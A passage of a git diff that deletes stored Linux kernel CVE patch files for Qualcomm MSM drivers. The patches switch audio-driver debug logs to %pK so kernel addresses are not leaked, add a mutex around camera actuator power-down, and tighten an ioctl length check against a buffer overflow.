session[%d]index[%d] data[%pK]size[%d]\n", - __func__, ac->session, port->cpu_buf, - data, *size); - /* -@@ -1902,7 +1902,7 @@ int q6asm_is_dsp_buf_avail(int dir, struct audio_client *ac) - uint32_t idx; - - if (!ac || (dir != OUT)) { -- pr_err("%s: ac %p dir %d\n", __func__, ac, dir); -+ pr_err("%s: ac %pK dir %d\n", __func__, ac, dir); - return ret; - } - -@@ -2169,13 +2169,13 @@ int q6asm_open_write_compressed(struct audio_client *ac, uint32_t format, - struct asm_stream_cmd_open_write_compressed open; - - if (ac == NULL) { -- pr_err("%s: ac[%p] NULL\n", __func__, ac); -+ pr_err("%s: ac[%pK] NULL\n", __func__, ac); - rc = -EINVAL; - goto fail_cmd; - } - - if (ac->apr == NULL) { -- pr_err("%s: APR handle[%p] NULL\n", __func__, ac->apr); -+ pr_err("%s: APR handle[%pK] NULL\n", __func__, ac->apr); - rc = -EINVAL; - goto fail_cmd; - } -@@ -4032,7 +4032,7 @@ int q6asm_memory_map(struct audio_client *ac, phys_addr_t buf_add, int dir, - - ac->port[dir].tmp_hdl = 0; - port = &ac->port[dir]; -- pr_debug("%s: buf_add 0x%pa, bufsz: %d\n", __func__, -+ pr_debug("%s: buf_add 0x%pK, bufsz: %d\n", 
__func__, - &buf_add, bufsz); - mregions->shm_addr_lsw = lower_32_bits(buf_add); - mregions->shm_addr_msw = populate_upper_32_bits(buf_add); -@@ -4218,7 +4218,7 @@ static int q6asm_memory_map_regions(struct audio_client *ac, int dir, - q6asm_add_mmaphdr(ac, &mmap_regions->hdr, cmd_size, TRUE, - ((ac->session << 8) | dir)); - atomic_set(&ac->mem_state, 1); -- pr_debug("%s: mmap_region=0x%p token=0x%x\n", __func__, -+ pr_debug("%s: mmap_region=0x%pK token=0x%x\n", __func__, - mmap_regions, ((ac->session << 8) | dir)); - - mmap_regions->hdr.opcode = ASM_CMD_SHARED_MEM_MAP_REGIONS; -@@ -4274,7 +4274,7 @@ static int q6asm_memory_map_regions(struct audio_client *ac, int dir, - buffer_node[i].mmap_hdl = ac->port[dir].tmp_hdl; - list_add_tail(&buffer_node[i].list, - &ac->port[dir].mem_map_handle); -- pr_debug("%s: i=%d, bufadd[i] = 0x%pa, maphdl[i] = 0x%x\n", -+ pr_debug("%s: i=%d, bufadd[i] = 0x%pK, maphdl[i] = 0x%x\n", - __func__, i, &buffer_node[i].buf_phys_addr, - buffer_node[i].mmap_hdl); - } -@@ -4501,7 +4501,7 @@ int q6asm_dts_eagle_set(struct audio_client *ac, int param_id, uint32_t size, - struct asm_dts_eagle_param *ad; - - if (!ac || ac->apr == NULL || (size == 0) || !data) { -- pr_err("DTS_EAGLE_ASM - %s: APR handle NULL, invalid size %u or pointer %p.\n", -+ pr_err("DTS_EAGLE_ASM - %s: APR handle NULL, invalid size %u or pointer %pK.\n", - __func__, size, data); - return -EINVAL; - } -@@ -4512,7 +4512,7 @@ int q6asm_dts_eagle_set(struct audio_client *ac, int param_id, uint32_t size, - __func__, sz); - return -ENOMEM; - } -- pr_debug("DTS_EAGLE_ASM - %s: ac %p param_id 0x%x size %u data %p m_id 0x%x\n", -+ pr_debug("DTS_EAGLE_ASM - %s: ac %pK param_id 0x%x size %u data %pK m_id 0x%x\n", - __func__, ac, param_id, size, data, m_id); - q6asm_add_hdr_async(ac, &ad->hdr, sz, 1); - ad->hdr.opcode = ASM_STREAM_CMD_SET_PP_PARAMS_V2; -@@ -4531,8 +4531,8 @@ int q6asm_dts_eagle_set(struct audio_client *ac, int param_id, uint32_t size, - if (po) { - struct list_head *ptr, 
*next; - struct asm_buffer_node *node; -- pr_debug("DTS_EAGLE_ASM - %s: using out of band memory (virtual %p, physical %lu)\n", -- __func__, po->kvaddr, (long)po->paddr); -+ pr_debug("DTS_EAGLE_ASM - %s: using out of band memory (virtual %pK, physical %pK)\n", -+ __func__, po->kvaddr, &po->paddr); - ad->param.data_payload_addr_lsw = lower_32_bits(po->paddr); - ad->param.data_payload_addr_msw = populate_upper_32_bits( - po->paddr); -@@ -4599,7 +4599,7 @@ int q6asm_dts_eagle_get(struct audio_client *ac, int param_id, uint32_t size, - (po ? 0 : size); - - if (!ac || ac->apr == NULL || (size == 0) || !data) { -- pr_err("DTS_EAGLE_ASM - %s: APR handle NULL, invalid size %u or pointer %p\n", -+ pr_err("DTS_EAGLE_ASM - %s: APR handle NULL, invalid size %u or pointer %pK\n", - __func__, size, data); - return -EINVAL; - } -@@ -4609,7 +4609,7 @@ int q6asm_dts_eagle_get(struct audio_client *ac, int param_id, uint32_t size, - __func__, sz); - return -ENOMEM; - } -- pr_debug("DTS_EAGLE_ASM - %s: ac %p param_id 0x%x size %u data %p m_id 0x%x\n", -+ pr_debug("DTS_EAGLE_ASM - %s: ac %pK param_id 0x%x size %u data %pK m_id 0x%x\n", - __func__, ac, param_id, size, data, m_id); - q6asm_add_hdr(ac, &ad->hdr, sz, TRUE); - ad->hdr.opcode = ASM_STREAM_CMD_GET_PP_PARAMS_V2; -@@ -4634,8 +4634,8 @@ int q6asm_dts_eagle_get(struct audio_client *ac, int param_id, uint32_t size, - if (po) { - struct list_head *ptr, *next; - struct asm_buffer_node *node; -- pr_debug("DTS_EAGLE_ASM - %s: using out of band memory (virtual %p, physical %lu)\n", -- __func__, po->kvaddr, (long)po->paddr); -+ pr_debug("DTS_EAGLE_ASM - %s: using out of band memory (virtual %pK, physical %pK)\n", -+ __func__, po->kvaddr, &po->paddr); - ad->param.data_payload_addr_lsw = lower_32_bits(po->paddr); - ad->param.data_payload_addr_msw = populate_upper_32_bits( - po->paddr); -@@ -5066,7 +5066,7 @@ static int __q6asm_read(struct audio_client *ac, bool is_custom_len_reqd, - } - ab = &port->buf[dsp_buf]; - -- dev_vdbg(ac->dev, 
"%s: session[%d]dsp-buf[%d][%p]cpu_buf[%d][%pa]\n", -+ dev_vdbg(ac->dev, "%s: session[%d]dsp-buf[%d][%pK]cpu_buf[%d][%pK]\n", - __func__, - ac->session, - dsp_buf, -@@ -5092,7 +5092,7 @@ static int __q6asm_read(struct audio_client *ac, bool is_custom_len_reqd, - port->dsp_buf = q6asm_get_next_buf(ac, port->dsp_buf, - port->max_buf_cnt); - mutex_unlock(&port->lock); -- dev_vdbg(ac->dev, "%s: buf add[%pa] token[%d] uid[%d]\n", -+ dev_vdbg(ac->dev, "%s: buf add[%pK] token[%d] uid[%d]\n", - __func__, &ab->phys, read.hdr.token, - read.seq_id); - rc = apr_send_pkt(ac->apr, (uint32_t *) &read); -@@ -5144,7 +5144,7 @@ int q6asm_read_nolock(struct audio_client *ac) - dsp_buf = port->dsp_buf; - ab = &port->buf[dsp_buf]; - -- dev_vdbg(ac->dev, "%s: session[%d]dsp-buf[%d][%p]cpu_buf[%d][%pa]\n", -+ dev_vdbg(ac->dev, "%s: session[%d]dsp-buf[%d][%pK]cpu_buf[%d][%pK]\n", - __func__, - ac->session, - dsp_buf, -@@ -5170,7 +5170,7 @@ int q6asm_read_nolock(struct audio_client *ac) - - port->dsp_buf = q6asm_get_next_buf(ac, port->dsp_buf, - port->max_buf_cnt); -- dev_vdbg(ac->dev, "%s: buf add[%pa] token[%d] uid[%d]\n", -+ dev_vdbg(ac->dev, "%s: buf add[%pK] token[%d] uid[%d]\n", - __func__, &ab->phys, read.hdr.token, - read.seq_id); - rc = apr_send_pkt(ac->apr, (uint32_t *) &read); -@@ -5233,7 +5233,7 @@ int q6asm_async_write(struct audio_client *ac, - else - lbuf_phys_addr = param->paddr; - -- dev_vdbg(ac->dev, "%s: token[0x%x], buf_addr[%pa], buf_size[0x%x], ts_msw[0x%x], ts_lsw[0x%x], lbuf_phys_addr: 0x[%pa]\n", -+ dev_vdbg(ac->dev, "%s: token[0x%x], buf_addr[%pK], buf_size[0x%x], ts_msw[0x%x], ts_lsw[0x%x], lbuf_phys_addr: 0x[%pK]\n", - __func__, - write.hdr.token, ¶m->paddr, - write.buf_size, write.timestamp_msw, -@@ -5381,7 +5381,7 @@ int q6asm_write(struct audio_client *ac, uint32_t len, uint32_t msw_ts, - list); - write.mem_map_handle = buf_node->mmap_hdl; - -- dev_vdbg(ac->dev, "%s: ab->phys[%pa]bufadd[0x%x] token[0x%x]buf_id[0x%x]buf_size[0x%x]mmaphdl[0x%x]" -+ 
dev_vdbg(ac->dev, "%s: ab->phys[%pK]bufadd[0x%x] token[0x%x]buf_id[0x%x]buf_size[0x%x]mmaphdl[0x%x]" - , __func__, - &ab->phys, - write.buf_addr_lsw, -@@ -5455,7 +5455,7 @@ int q6asm_write_nolock(struct audio_client *ac, uint32_t len, uint32_t msw_ts, - port->dsp_buf = q6asm_get_next_buf(ac, port->dsp_buf, - port->max_buf_cnt); - -- dev_vdbg(ac->dev, "%s: ab->phys[%pa]bufadd[0x%x]token[0x%x] buf_id[0x%x]buf_size[0x%x]mmaphdl[0x%x]" -+ dev_vdbg(ac->dev, "%s: ab->phys[%pK]bufadd[0x%x]token[0x%x] buf_id[0x%x]buf_size[0x%x]mmaphdl[0x%x]" - , __func__, - &ab->phys, - write.buf_addr_lsw, -diff --git a/sound/soc/msm/qdsp6v2/q6core.c b/sound/soc/msm/qdsp6v2/q6core.c -index 0c85d60..41ebf63 100644 ---- a/sound/soc/msm/qdsp6v2/q6core.c -+++ b/sound/soc/msm/qdsp6v2/q6core.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -184,7 +184,7 @@ void ocm_core_open(void) - if (q6core_lcl.core_handle_q == NULL) - q6core_lcl.core_handle_q = apr_register("ADSP", "CORE", - aprv2_core_fn_q, 0xFFFFFFFF, NULL); -- pr_debug("%s: Open_q %p\n", __func__, q6core_lcl.core_handle_q); -+ pr_debug("%s: Open_q %pK\n", __func__, q6core_lcl.core_handle_q); - if (q6core_lcl.core_handle_q == NULL) { - if (__ratelimit(&rl)) - pr_err("%s: Unable to register CORE\n", -@@ -347,7 +347,7 @@ int core_dts_eagle_set(int size, char *data) - - pr_debug("DTS_EAGLE_CORE - %s\n", __func__); - if (size <= 0 || !data) { -- pr_err("DTS_EAGLE_CORE - %s: invalid size %i or pointer %p.\n", -+ pr_err("DTS_EAGLE_CORE - %s: invalid size %i or pointer %pK.\n", - __func__, size, data); - return -EINVAL; - } -@@ -393,7 +393,7 @@ int core_dts_eagle_get(int id, int size, char *data) - - pr_debug("DTS_EAGLE_CORE - %s\n", __func__); - if (size <= 0 || !data) { -- 
pr_err("DTS_EAGLE_CORE - %s: invalid size %i or pointer %p.\n", -+ pr_err("DTS_EAGLE_CORE - %s: invalid size %i or pointer %pK.\n", - __func__, size, data); - return -EINVAL; - } -diff --git a/sound/soc/msm/qdsp6v2/q6lsm.c b/sound/soc/msm/qdsp6v2/q6lsm.c -index 02ba8e4..fa2ab564 100644 ---- a/sound/soc/msm/qdsp6v2/q6lsm.c -+++ b/sound/soc/msm/qdsp6v2/q6lsm.c -@@ -1,5 +1,5 @@ - /* -- * Copyright (c) 2013-2015, Linux Foundation. All rights reserved. -+ * Copyright (c) 2013-2016, Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -134,7 +134,7 @@ static int q6lsm_callback(struct apr_client_data *data, void *priv) - uint32_t *payload; - - if (!client || !data) { -- pr_err("%s: client %p data %p\n", -+ pr_err("%s: client %pK data %pK\n", - __func__, client, data); - WARN_ON(1); - return -EINVAL; -@@ -886,7 +886,7 @@ int q6lsm_register_sound_model(struct lsm_client *client, - rmb(); - cmd.mem_map_handle = client->sound_model.mem_map_handle; - -- pr_debug("%s: addr %pa, size %d, handle 0x%x\n", __func__, -+ pr_debug("%s: addr %pK, size %d, handle 0x%x\n", __func__, - &client->sound_model.phys, cmd.model_size, cmd.mem_map_handle); - rc = q6lsm_apr_send_pkt(client, client->apr, &cmd, true, NULL); - if (rc) -@@ -960,7 +960,7 @@ static int q6lsm_memory_map_regions(struct lsm_client *client, - int rc; - int cmd_size = 0; - -- pr_debug("%s: dma_addr_p 0x%pa, dma_buf_sz %d, mmap_p 0x%p, session %d\n", -+ pr_debug("%s: dma_addr_p 0x%pK, dma_buf_sz %d, mmap_p 0x%pK, session %d\n", - __func__, &dma_addr_p, dma_buf_sz, mmap_p, - client->session); - if (CHECK_SESSION(client->session)) { -@@ -1240,7 +1240,7 @@ int q6lsm_snd_model_buf_alloc(struct lsm_client *client, size_t len, - if (cal_block == NULL) - goto fail; - -- pr_debug("%s:Snd Model len = %zd cal size %zd phys addr %pa", __func__, -+ pr_debug("%s:Snd Model len = %zd cal size %zd phys 
addr %pK", __func__, - len, cal_block->cal_data.size, - &cal_block->cal_data.paddr); - if (!cal_block->cal_data.paddr) { -@@ -1295,8 +1295,8 @@ int q6lsm_snd_model_buf_alloc(struct lsm_client *client, size_t len, - memcpy((client->sound_model.data + pad_zero + - client->sound_model.size), - (uint32_t *)cal_block->cal_data.kvaddr, client->lsm_cal_size); -- pr_debug("%s: Copy cal start virt_addr %p phy_addr %pa\n" -- "Offset cal virtual Addr %p\n", __func__, -+ pr_debug("%s: Copy cal start virt_addr %pK phy_addr %pK\n" -+ "Offset cal virtual Addr %pK\n", __func__, - client->sound_model.data, &client->sound_model.phys, - (pad_zero + client->sound_model.data + - client->sound_model.size)); -@@ -1610,7 +1610,7 @@ int q6lsm_lab_control(struct lsm_client *client, u32 enable) - u32 param_size; - - if (!client) { -- pr_err("%s: invalid param client %p\n", __func__, client); -+ pr_err("%s: invalid param client %pK\n", __func__, client); - return -EINVAL; - } - /* enable/disable lab on dsp */ -@@ -1667,7 +1667,7 @@ int q6lsm_stop_lab(struct lsm_client *client) - { - int rc = 0; - if (!client) { -- pr_err("%s: invalid param client %p\n", __func__, client); -+ pr_err("%s: invalid param client %pK\n", __func__, client); - return -EINVAL; - } - rc = q6lsm_cmd(client, LSM_SESSION_CMD_EOB, true); -@@ -1680,7 +1680,7 @@ int q6lsm_read(struct lsm_client *client, struct lsm_cmd_read *read) - { - int rc = 0; - if (!client || !read) { -- pr_err("%s: Invalid params client %p read %p\n", __func__, -+ pr_err("%s: Invalid params client %pK read %pK\n", __func__, - client, read); - return -EINVAL; - } -@@ -1750,7 +1750,7 @@ int q6lsm_lab_buffer_alloc(struct lsm_client *client, bool alloc) - kfree(client->lab_buffer); - client->lab_buffer = NULL; - } else { -- pr_debug("%s: Memory map handle %x phys %pa size %d\n", -+ pr_debug("%s: Memory map handle %x phys %pK size %d\n", - __func__, - client->lab_buffer[0].mem_map_handle, - &client->lab_buffer[0].phys, -diff --git 
a/sound/soc/msm/qdsp6v2/q6voice.c b/sound/soc/msm/qdsp6v2/q6voice.c -index 04909d3..face98c 100644 ---- a/sound/soc/msm/qdsp6v2/q6voice.c -+++ b/sound/soc/msm/qdsp6v2/q6voice.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -348,7 +348,7 @@ static struct voice_data *voice_get_session(u32 session_id) - break; - } - -- pr_debug("%s:session_id 0x%x session handle %p\n", -+ pr_debug("%s:session_id 0x%x session handle %pK\n", - __func__, session_id, v); - - return v; -@@ -3087,7 +3087,7 @@ static int voice_map_cal_memory(struct cal_block_data *cal_block, - cal_block->map_data.map_size, - VOC_CAL_MEM_MAP_TOKEN); - if (result < 0) { -- pr_err("%s: Mmap did not work! addr = 0x%pa, size = %zd\n", -+ pr_err("%s: Mmap did not work! addr = 0x%pK, size = %zd\n", - __func__, - &cal_block->cal_data.paddr, - cal_block->map_data.map_size); -@@ -3120,7 +3120,7 @@ static int remap_cal_data(struct cal_block_data *cal_block, - goto done; - } - } else { -- pr_debug("%s: Cal block 0x%pa, size %zd already mapped. Q6 map handle = %d\n", -+ pr_debug("%s: Cal block 0x%pK, size %zd already mapped. Q6 map handle = %d\n", - __func__, &cal_block->cal_data.paddr, - cal_block->map_data.map_size, - cal_block->map_data.q6map_handle); -@@ -3318,7 +3318,7 @@ int voc_map_rtac_block(struct rtac_cal_block_data *cal_block) - if (!is_rtac_memory_allocated()) { - result = voice_alloc_rtac_mem_map_table(); - if (result < 0) { -- pr_err("%s: RTAC alloc mem map table did not work! addr = 0x%pa, size = %d\n", -+ pr_err("%s: RTAC alloc mem map table did not work! 
addr = 0x%pK, size = %d\n", - __func__, - &cal_block->cal_data.paddr, - cal_block->map_data.map_size); -@@ -3333,7 +3333,7 @@ int voc_map_rtac_block(struct rtac_cal_block_data *cal_block) - cal_block->map_data.map_size, - VOC_RTAC_MEM_MAP_TOKEN); - if (result < 0) { -- pr_err("%s: RTAC mmap did not work! addr = 0x%pa, size = %d\n", -+ pr_err("%s: RTAC mmap did not work! addr = 0x%pK, size = %d\n", - __func__, - &cal_block->cal_data.paddr, - cal_block->map_data.map_size); -@@ -4444,7 +4444,7 @@ int voc_start_record(uint32_t port_id, uint32_t set, uint32_t session_id) - - break; - } -- pr_debug("%s: port_id: %d, set: %d, v: %p\n", -+ pr_debug("%s: port_id: %d, set: %d, v: %pK\n", - __func__, port_id, set, v); - - mutex_lock(&v->lock); -@@ -6510,12 +6510,12 @@ static int voice_alloc_oob_shared_mem(void) - cnt++; - } - -- pr_debug("%s buf[0].data:[%p], buf[0].phys:[%pa], &buf[0].phys:[%p],\n", -+ pr_debug("%s buf[0].data:[%pK], buf[0].phys:[%pK], &buf[0].phys:[%pK],\n", - __func__, - (void *)v->shmem_info.sh_buf.buf[0].data, - &v->shmem_info.sh_buf.buf[0].phys, - (void *)&v->shmem_info.sh_buf.buf[0].phys); -- pr_debug("%s: buf[1].data:[%p], buf[1].phys[%pa], &buf[1].phys[%p]\n", -+ pr_debug("%s: buf[1].data:[%pK], buf[1].phys[%pK], &buf[1].phys[%pK]\n", - __func__, - (void *)v->shmem_info.sh_buf.buf[1].data, - &v->shmem_info.sh_buf.buf[1].phys, -@@ -6557,7 +6557,7 @@ static int voice_alloc_oob_mem_table(void) - } - - v->shmem_info.memtbl.size = sizeof(struct vss_imemory_table_t); -- pr_debug("%s data[%p]phys[%pa][%p]\n", __func__, -+ pr_debug("%s data[%pK]phys[%pK][%pK]\n", __func__, - (void *)v->shmem_info.memtbl.data, - &v->shmem_info.memtbl.phys, - (void *)&v->shmem_info.memtbl.phys); -@@ -6909,7 +6909,7 @@ static int voice_alloc_cal_mem_map_table(void) - } - - common.cal_mem_map_table.size = sizeof(struct vss_imemory_table_t); -- pr_debug("%s: data %p phys %pa\n", __func__, -+ pr_debug("%s: data %pK phys %pK\n", __func__, - common.cal_mem_map_table.data, - 
&common.cal_mem_map_table.phys); - -@@ -6936,7 +6936,7 @@ static int voice_alloc_rtac_mem_map_table(void) - } - - common.rtac_mem_map_table.size = sizeof(struct vss_imemory_table_t); -- pr_debug("%s: data %p phys %pa\n", __func__, -+ pr_debug("%s: data %pK phys %pK\n", __func__, - common.rtac_mem_map_table.data, - &common.rtac_mem_map_table.phys); - -@@ -7537,7 +7537,7 @@ static int voice_alloc_source_tracking_shared_memory(void) - memset((void *)(common.source_tracking_sh_mem.sh_mem_block.data), 0, - common.source_tracking_sh_mem.sh_mem_block.size); - -- pr_debug("%s: sh_mem_block: phys:[%pa], data:[0x%p], size:[%zd]\n", -+ pr_debug("%s: sh_mem_block: phys:[%pK], data:[0x%pK], size:[%zd]\n", - __func__, - &(common.source_tracking_sh_mem.sh_mem_block.phys), - (void *)(common.source_tracking_sh_mem.sh_mem_block.data), -@@ -7568,7 +7568,7 @@ static int voice_alloc_source_tracking_shared_memory(void) - memset((void *)(common.source_tracking_sh_mem.sh_mem_table.data), 0, - common.source_tracking_sh_mem.sh_mem_table.size); - -- pr_debug("%s sh_mem_table: phys:[%pa], data:[0x%p], size:[%zd],\n", -+ pr_debug("%s sh_mem_table: phys:[%pK], data:[0x%pK], size:[%zd],\n", - __func__, - &(common.source_tracking_sh_mem.sh_mem_table.phys), - (void *)(common.source_tracking_sh_mem.sh_mem_table.data), -diff --git a/sound/soc/msm/qdsp6v2/rtac.c b/sound/soc/msm/qdsp6v2/rtac.c -index b1954a4..feed251 100644 ---- a/sound/soc/msm/qdsp6v2/rtac.c -+++ b/sound/soc/msm/qdsp6v2/rtac.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -177,7 +177,7 @@ int rtac_allocate_cal_buffer(uint32_t cal_type) - } - - if (rtac_cal[cal_type].cal_data.paddr != 0) { -- pr_err("%s: memory already allocated! 
cal_type %d, paddr 0x%pa\n",
-+ pr_err("%s: memory already allocated! cal_type %d, paddr 0x%pK\n",
- __func__, cal_type, &rtac_cal[cal_type].cal_data.paddr);
- result = -EPERM;
- goto done;
-@@ -196,7 +196,7 @@ int rtac_allocate_cal_buffer(uint32_t cal_type)
- goto done;
- }
-
-- pr_debug("%s: cal_type %d, paddr 0x%pa, kvaddr 0x%p, map_size 0x%x\n",
-+ pr_debug("%s: cal_type %d, paddr 0x%pK, kvaddr 0x%pK, map_size 0x%x\n",
- __func__, cal_type,
- &rtac_cal[cal_type].cal_data.paddr,
- rtac_cal[cal_type].cal_data.kvaddr,
-@@ -226,7 +226,7 @@ int rtac_free_cal_buffer(uint32_t cal_type)
- result = msm_audio_ion_free(rtac_cal[cal_type].map_data.ion_client,
- rtac_cal[cal_type].map_data.ion_handle);
- if (result < 0) {
-- pr_err("%s: ION free for RTAC failed! cal_type %d, paddr 0x%pa\n",
-+ pr_err("%s: ION free for RTAC failed! cal_type %d, paddr 0x%pK\n",
- __func__, cal_type, &rtac_cal[cal_type].cal_data.paddr);
- goto done;
- }
-@@ -671,7 +671,7 @@ static int get_voice_index(u32 mode, u32 handle)
- /* ADM APR */
- void rtac_set_adm_handle(void *handle)
- {
-- pr_debug("%s: handle = %p\n", __func__, handle);
-+ pr_debug("%s: handle = %pK\n", __func__, handle);
-
- mutex_lock(&rtac_adm_apr_mutex);
- rtac_adm_apr_data.apr_handle = handle;
-@@ -729,7 +729,7 @@ u32 send_adm_apr(void *buf, u32 opcode)
-
- if (copy_from_user(&user_buf_size, (void *)buf,
- sizeof(user_buf_size))) {
-- pr_err("%s: Copy from user failed! buf = 0x%p\n",
-+ pr_err("%s: Copy from user failed!
buf = 0x%pK\n",
- __func__, buf);
- goto done;
- }
-@@ -829,7 +829,7 @@ u32 send_adm_apr(void *buf, u32 opcode)
- memcpy(rtac_adm_buffer, &adm_params, sizeof(adm_params));
- atomic_set(&rtac_adm_apr_data.cmd_state, 1);
-
-- pr_debug("%s: Sending RTAC command ioctl 0x%x, paddr 0x%pa\n",
-+ pr_debug("%s: Sending RTAC command ioctl 0x%x, paddr 0x%pK\n",
- __func__, opcode,
- &rtac_cal[ADM_RTAC_CAL].cal_data.paddr);
-
-@@ -948,7 +948,7 @@ u32 send_rtac_asm_apr(void *buf, u32 opcode)
-
- if (copy_from_user(&user_buf_size, (void *)buf,
- sizeof(user_buf_size))) {
-- pr_err("%s: Copy from user failed! buf = 0x%p\n",
-+ pr_err("%s: Copy from user failed! buf = 0x%pK\n",
- __func__, buf);
- goto done;
- }
-@@ -1048,7 +1048,7 @@ u32 send_rtac_asm_apr(void *buf, u32 opcode)
- memcpy(rtac_asm_buffer, &asm_params, sizeof(asm_params));
- atomic_set(&rtac_asm_apr_data[session_id].cmd_state, 1);
-
-- pr_debug("%s: Sending RTAC command ioctl 0x%x, paddr 0x%pa\n",
-+ pr_debug("%s: Sending RTAC command ioctl 0x%x, paddr 0x%pK\n",
- __func__, opcode,
- &rtac_cal[ASM_RTAC_CAL].cal_data.paddr);
-
-@@ -1188,7 +1188,7 @@ static u32 send_rtac_afe_apr(void *buf, uint32_t opcode)
-
- if (copy_from_user(&user_afe_buf, (void *)buf,
- sizeof(struct rtac_afe_user_data))) {
-- pr_err("%s: Copy from user failed! buf = 0x%p\n",
-+ pr_err("%s: Copy from user failed! buf = 0x%pK\n",
- __func__, buf);
- goto done;
- }
-@@ -1304,7 +1304,7 @@ static u32 send_rtac_afe_apr(void *buf, uint32_t opcode)
-
- atomic_set(&rtac_afe_apr_data.cmd_state, 1);
-
-- pr_debug("%s: Sending RTAC command ioctl 0x%x, paddr 0x%pa\n",
-+ pr_debug("%s: Sending RTAC command ioctl 0x%x, paddr 0x%pK\n",
- __func__, opcode,
- &rtac_cal[AFE_RTAC_CAL].cal_data.paddr);
-
-@@ -1428,7 +1428,7 @@ u32 send_voice_apr(u32 mode, void *buf, u32 opcode)
-
- if (copy_from_user(&user_buf_size, (void *)buf,
- sizeof(user_buf_size))) {
-- pr_err("%s: Copy from user failed! buf = 0x%p\n",
-+ pr_err("%s: Copy from user failed!
buf = 0x%pK\n",
- __func__, buf);
- goto done;
- }
-@@ -1529,7 +1529,7 @@ u32 send_voice_apr(u32 mode, void *buf, u32 opcode)
- memcpy(rtac_voice_buffer, &voice_params, sizeof(voice_params));
- atomic_set(&rtac_voice_apr_data[mode].cmd_state, 1);
-
-- pr_debug("%s: Sending RTAC command ioctl 0x%x, paddr 0x%pa\n",
-+ pr_debug("%s: Sending RTAC command ioctl 0x%x, paddr 0x%pK\n",
- __func__, opcode,
- &rtac_cal[VOICE_RTAC_CAL].cal_data.paddr);
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8412/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8412/ANY/0001.patch
deleted file mode 100644
index 2c1b2231..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8412/ANY/0001.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From 42a98c44669d92dafcf4d6336bdccaeb2db12786 Mon Sep 17 00:00:00 2001
-From: Sureshnaidu Laveti
-Date: Mon, 3 Oct 2016 04:01:32 -0700
-Subject: msm: sensor: Adding mutex for actuator power down operations
-
-Protecting operations performed during actuator powerdown
-from race condition by adding mutex.
-CRs-Fixed: 1071891
-
-Change-Id: I7d6b2e8878788615c02678a4a28d31dca0ed6bca
-Signed-off-by: Sureshnaidu Laveti
----
- drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-index bf39738..a700f83 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-@@ -1559,11 +1559,13 @@ static long msm_actuator_subdev_ioctl(struct v4l2_subdev *sd,
- pr_err("a_ctrl->i2c_client.i2c_func_tbl NULL\n");
- return -EINVAL;
- }
-+ mutex_lock(a_ctrl->actuator_mutex);
- rc = msm_actuator_power_down(a_ctrl);
- if (rc < 0) {
- pr_err("%s:%d Actuator Power down failed\n",
- __func__, __LINE__);
- }
-+ mutex_unlock(a_ctrl->actuator_mutex);
- return msm_actuator_close(sd, NULL);
- default:
- return -ENOIOCTLCMD;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8413/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8413/ANY/0001.patch
deleted file mode 100644
index 9088b767..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8413/ANY/0001.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From bc77232707df371ff6bab9350ae39676535c0e9d Mon Sep 17 00:00:00 2001
-From: Krishnankutty Kolathappilly
-Date: Wed, 16 Nov 2016 18:22:58 -0800
-Subject: msm: cpp: Fix for buffer overflow in cpp.
-
-Fix for buffer overflow while handling ioctl.
-Instead of checking for length boundary, fix checks
-for exact length.
-
-CRs-Fixed: 518731
-Change-Id: I9002f84b219e8b06ae0672d87c2d999e728a75aa
-Signed-off-by: Krishnankutty Kolathappilly
----
- drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c | 3 +--
- 1 file changed, 1 insertion(+), 2 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-index 022dd6b..0792380 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-@@ -2070,8 +2070,7 @@ long msm_cpp_subdev_ioctl(struct v4l2_subdev *sd,
- uint32_t identity;
- struct msm_cpp_buff_queue_info_t *buff_queue_info;
- CPP_DBG("VIDIOC_MSM_CPP_DEQUEUE_STREAM_BUFF_INFO\n");
-- if ((ioctl_ptr->len == 0) ||
-- (ioctl_ptr->len > sizeof(uint32_t))) {
-+ if (ioctl_ptr->len != sizeof(uint32_t)) {
- mutex_unlock(&cpp_dev->mutex);
- return -EINVAL;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8414/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8414/ANY/0001.patch
deleted file mode 100644
index b3c39fb7..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8414/ANY/0001.patch
+++ /dev/null
@@ -1,52 +0,0 @@
-From 320970d3da9b091e96746424c44649a91852a846 Mon Sep 17 00:00:00 2001
-From: Swetha Chikkaboraiah
-Date: Wed, 2 Nov 2016 16:49:41 +0530
-Subject: qcom: scm: remove printing input arguments
